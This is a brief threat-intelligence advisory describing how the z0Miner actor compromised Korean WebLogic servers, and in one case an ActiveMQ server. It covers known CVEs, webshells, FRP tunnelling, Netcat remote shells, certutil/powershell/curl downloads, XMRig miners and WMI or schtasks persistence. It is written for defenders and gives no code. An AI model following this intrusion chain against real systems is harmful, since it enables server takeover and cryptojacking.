Researchers observed threat actor z0Miner targeting Korean WebLogic servers as download servers for distributing malware, including miners and network tools. It is recommended to look for indicators of compromise in your environment, and if any are identified, remove the files immediately and redeploy workloads from a known clean state.
On January 26, 2024, researchers discovered instances of z0Miner distributing malware to Korean WebLogic servers. The method of downloading malicious files varied depending on the operating system: powershell.exe and certutil.exe for Windows, and the curl command for Linux.
z0Miner employed WebLogic vulnerabilities such as CVE-2020-14882 to upload JSP WebShells, including JSP File Browser, Shack2, and Behinder. They employed FRP for Remote Desktop Protocol (RDP) communication, both the default and customized versions. Netcat was downloaded and executed to establish remote shell connections, bypassing firewalls. The researchers also observed a case of exploitation of an Apache ActiveMQ vulnerability (CVE-2023-46604), in which the threat actor installed Netcat and additionally installed AnyDesk.
z0Miner distributed different versions of XMRig for Windows and Linux systems, registering persistence through WMI Event Filters and Consumers or Task Scheduler (schtasks).